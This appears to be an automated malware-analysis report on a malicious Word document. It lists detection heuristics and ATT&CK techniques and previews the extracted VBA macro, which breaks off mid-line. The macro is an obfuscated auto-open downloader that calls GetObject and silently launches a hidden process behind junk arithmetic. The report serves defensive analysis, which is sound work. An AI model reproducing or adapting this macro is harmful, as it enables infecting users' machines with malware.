MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro. The 'autoopen' subroutine is present and uses a GetObject call, which is a common technique for downloading and executing secondary payloads. The ClamAV detection name 'Doc.Malware.Sagent-6902893-0' further confirms its malicious nature. The obfuscated nature of the VBA code prevents a more detailed analysis of the payload's specific actions.
Heuristics 7
-
ClamAV: Doc.Malware.Sagent-6902893-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Sagent-6902893-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 16486 bytes |
SHA-256: 85e3a87222971c779d6dad3069d14b7682c83b939c30dd4e904e7a41fead598b |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "GQDAA4A"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "mGwAGQD"
Attribute VB_Base = "0{A3231994-0405-462A-A1C2-8FF3BF66FF47}{A302F022-DC64-47CA-B2F5-9FDFF06F53D7}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "hAAZAA"
Sub autoopen()
On Error Resume Next
If mAAAcA = oCABAxA Then
lAQA_AA = 360460939 * CInt(616932250) / _
493785898 + Sqr(458583148) * 728298510 / CInt(931328294) * (650238058 * 551928430)
kcDZ4UQ = (93967997 - Asc(wQAcBB) / BABAD1A / 367112517 + _
hB1Zk41A / Fix(657703886 + Log(FAABBX * Sgn(583937233) + toUAZUD / CSng(427730617))))
End If
If OwAAGD4_ = pAADBB Then
VAUDABAk = 712164150 * CInt(678201983) / _
403439880 + Sqr(608737942) * 346981986 / CInt(887036070) * (31494867 * 189248671)
BDZGDAxB = (51313011 - Asc(SxxAAB) / vAAUBA / 938327368 + _
oAQADo / Fix(547418284 + Log(mAAAAQ * Sgn(602746105) + jDoA1_A / CSng(108804646))))
End If
If loZ1AQ = nxXQBkAA Then
rwXCUQ = 959896255 * CInt(130090308) / _
129873245 + Sqr(724149820) * 455445265 / CInt(707421804) * (458249446 * 249045504)
zU_1AB = (890124428 - Asc(cUUoDD4) / JACQXUD / 790973879 + _
ZABCcGkQ / Fix(714023240 + Log(AAQDAD * Sgn(258489203) + SBkxAAAw / CSng(526080821))))
End If
Set v_BGcG = GetObject(mGwAGQD.RGAADA)
If jBxAoCUD = c4AAoDZX Then
qkADAAwA = 135865924 * CInt(496703309) / _
59940355 + Sqr(979082682) * 820981873 / CInt(149309126) * (563785917 * 364391530)
HDBoDDQ = (607898886 - Asc(WA1BXG) / MCAAU1C / 725977624 + _
okwZwBA / Fix(429506819 + Log(Cc1kAAxA * Sgn(194570980) + HcAko1oG / CSng(290826635))))
End If
If jAooQAA = T4AA4B Then
ZDAUUAx = 8602144 * CInt(576647515) / _
85589341 + Sqr(516300873) * 879881470 / CInt(857882346) * (196164702 * 789476055)
KAAAAXAx = (13419597 - Asc(wQwAQ1) / NBA4BowA / 289888408 + _
JAAAUko / Fix(904064640 + Log(QGU_ADAo * Sgn(871851531) + wDAc1kB / CSng(773913630))))
End If
If jQQwoA = LQxBAQB Then
oAQAU4QD = 443932658 * CInt(795783673) / _
756604422 + Sqr(927126228) * 716537682 / CInt(886780290) * (972002796 * 653697702)
RQQBQxX = (523253843 - Asc(iXo_AAxw) / MAxk_A / 244604452 + _
tAAAAwG / Fix(312501987 + Log(mAoQUA * Sgn(253004511) + GABAcA / CSng(128409972))))
End If
v_BGcG.ShowWindow = 77530 - 77530
If jAAoAx = lAA1AXGA Then
OBkACAX = 269266117 * CInt(715040411) / _
842971776 + Sqr(751485346) * 212281959 / CInt(754140829) * (533957089 * 796873008)
aAXA_UxA = (137014469 - Asc(KQAZAA) / KDwAGQ / 318548519 + _
aAQZQA / Fix(152383850 + Log(zAAkcA1 * Sgn(201328988) + FwQCAB / CSng(317166610))))
End If
If u1AAcA = nBB_UA Then
k4UAABAQ = 85219461 * CInt(204448542) / _
239211574 + Sqr(390941598) * 839005007 / CInt(74740253) * (911348423 * 418700860)
zAcGGADX = (77693527 - Asc(vQA1DA) / UCAB1A / 795536785 + _
JGAAZUQ / Fix(117999692 + Log(z__cZA * Sgn(651591479) + WDQAD1B / CSng(738625387))))
End If
If pXUXABkQ = pDGXcw4 Then
SZQAcAGB = 459707733 * CInt(94268094) / _
280763892 + Sqr(556862412) * 850561241 / CInt(699526922) * (262996421 * 234784759)
QAkxDC = (420550504 - Asc(coxAADk) / OQAoUc / 666531387 + _
vCGACAA / Fix(272745002 + Log(RABxDAkc * Sgn(446761763) + XUQxCA / CSng(453161763))))
End If
GetObject(mGwAGQD.Gcw1A_AC). _
Create# RoAoxUAC + mGwAGQD.B4QAXA + BXAU4GCc + mGwAGQD.GZAAAA + jAkAUAA + mGwAGQD.JBQAoABG + wckQkUDx, EQUQAUAZ, v_BGcG, hAAAXDAA
If sABo4Q = dC4UD1A Then
cBAGAAAk = 232633544 * CInt(118776403) / _
506359801 + Sqr(108038854) * 715836710 / CInt(151988754) * (880926149 * 381311283)
f1Ax1BAA = (288996547 - Asc(tQA4UAo) / qkAADGo / 460044872 + _
lAB_wDUQ / F
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.